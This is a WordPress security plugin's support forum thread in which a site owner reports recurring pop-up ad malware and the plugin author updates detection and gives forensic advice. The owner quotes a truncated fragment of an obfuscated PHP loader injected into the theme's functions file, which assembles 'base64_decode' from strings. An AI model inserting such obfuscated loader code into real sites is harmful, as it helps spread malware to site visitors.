Support » Plugin: Anti-Malware Security and Brute-Force Firewall » global $zeeta; not being found by gotmls

  • Resolved ontheroad

    (@ontheroad)


    Hello

    I ran GOTMLS and it found several files which have been quarantined which is great. However, the malware kept coming back.

    It’s a typical pop up when clicking a link malware – rougue ads

    I searched through the site which you can find here and located the following code in Functions

    global $zeeta;
    if (!$npDcheckClassBgp && !isset($zeeta)) {

    $ea = ‘_shaesx_’; $ay = ‘get_data_ya’; $ae = ‘decode’; $ea = str_replace(‘_sha’, ‘bas’, $ea); $ao = ‘wp_cd’; $ee = $ea.$ae; $oa = str_replace(‘sx’, ’64’, $ee); $algo = ‘default’; $pass = “Zgc5c4MXrK0ubQgN4pBWZv2dPRfXN70cmCWIX7HVoQ==”;

    There’s more code, which I can email if you want.

    I’m wondering if GOTMLS can be updated to help remove this global $zeeta issue?
    `

    • This topic was modified 1 month, 2 weeks ago by ontheroad.
    • This topic was modified 1 month, 2 weeks ago by ontheroad.
Viewing 5 replies - 1 through 5 (of 5 total)
  • Plugin Author Eli

    (@scheeeli)

    I’ve seen code like that sample that you post and my plugin should remove it automatically, but I would need to see the whole file to be sure that this is still the same threat. It you can please email me the entire contents of that file then I will check it and add this new variant to my malware definitions if it has changed.

    eli AT gotmls DOT net

    Hi Eli,

    Thank you for the prompt reply. I’ve just emailed you the full Functions code. I’m also happy to help if you you need more information. There are .bt files with ip addresses left by this virus too.

    I’ll be happy to make a donation if your plugin is able to remove this malicious code!

    Thank you.

    Plugin Author Eli

    (@scheeeli)

    Just following up here to thank you for the full code that you emailed me. This was basically the same threat that I had seen before d already had in my malware definitions, but whereas I had only ever seen it by itself in an entirely malicious file in the past, this was injected right into your existing PHP code. so I release a new definition update that will remove this new variant for you (without removing or damaging the existing PHP code that is supposed to be there ; – )

    Please download the latest definition updates and run the complete scan again. I don’t think I need to see those IP Address lists but please let me know if you find anything else I should look at.

    No problem Eli, and thank you for updating the definitions.

    I’m currently monitoring. Your update removed the infected file, but within in a few hours the site was infected again. I’m watching the site logs to see where the infection is coming from and to try and nail it down.

    In the meanwhile, do you recommend any of these security plugins? eg iThemes Security etc. Or would it be better to use your firewall?

    Plugin Author Eli

    (@scheeeli)

    If you are working to prevent or contain an active threat then I would say: the more security, the wetter. While many firewall are very similar in function and might overlap on some of the same protection there is enough variance that it can sometimes be helpful to double up on your protection. The only thing you have to watch out for is overzealous firewalls that might end up locking you out of your own site 😉

    Some firewall plugin might also block the operation of other security plugins. I think we all try not to step on each others toes but it’s a delicate balance when your job is to scrutinize suspicious activity on the site.

    Don’t be afraid to try out other plugins but look at the reviews and look for plugins that are well supported so that you can get help if you get in over your head.

    As for tacking down the source of this recurring threat, your biggest forensic clues are the timestamps on the maliciously modified files. Look in the Anti-Malware Quarantine for the Infection Times of the latest infections (these are represented in GMT) and then cross-reference these times with the activity in your access_log files.

    • This reply was modified 1 month, 1 week ago by Eli.
Viewing 5 replies - 1 through 5 (of 5 total)
  • You must be logged in to reply to this topic.